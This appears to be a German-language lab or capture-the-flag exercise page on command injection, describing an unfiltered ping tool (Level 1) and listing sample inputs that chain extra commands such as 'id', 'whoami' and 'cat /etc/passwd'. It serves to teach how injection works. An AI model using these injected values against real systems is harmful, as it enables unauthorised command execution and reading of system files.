Command Injection

Ein Web-Tool führt Shell-Befehle aus – finde einen Weg, eigene Befehle einzuschleusen.

Level 1 Level 2 Level 3 Level 4
Level 1: Kein Filter
Die Eingabe wird ungefiltert an die Shell übergeben. 
Die Eingabe wird direkt in den Befehl eingebaut:
  ping -c 2 

Versuch:
  8.8.8.8; id
  8.8.8.8; cat /etc/passwd
  8.8.8.8 && whoami